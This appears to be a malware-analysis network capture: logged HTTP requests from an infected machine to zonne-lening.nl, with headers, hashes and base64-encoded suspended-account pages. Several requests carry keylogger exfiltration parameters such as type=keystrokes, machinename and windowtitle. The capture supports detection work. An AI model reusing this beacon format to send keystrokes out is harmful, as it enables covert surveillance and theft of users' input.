cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:55%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 16:55:05 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
34 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20PM text/html post.php 302 Found HTML 345.0 B 03/18/60 10:21:46
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0yOjU0JTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
99519384be1611894f7036f6daa9f4ddd56a9cb0b7906d804e607a81cba102a4
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 22:54:35 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
35 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/18/60 11:20:36
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
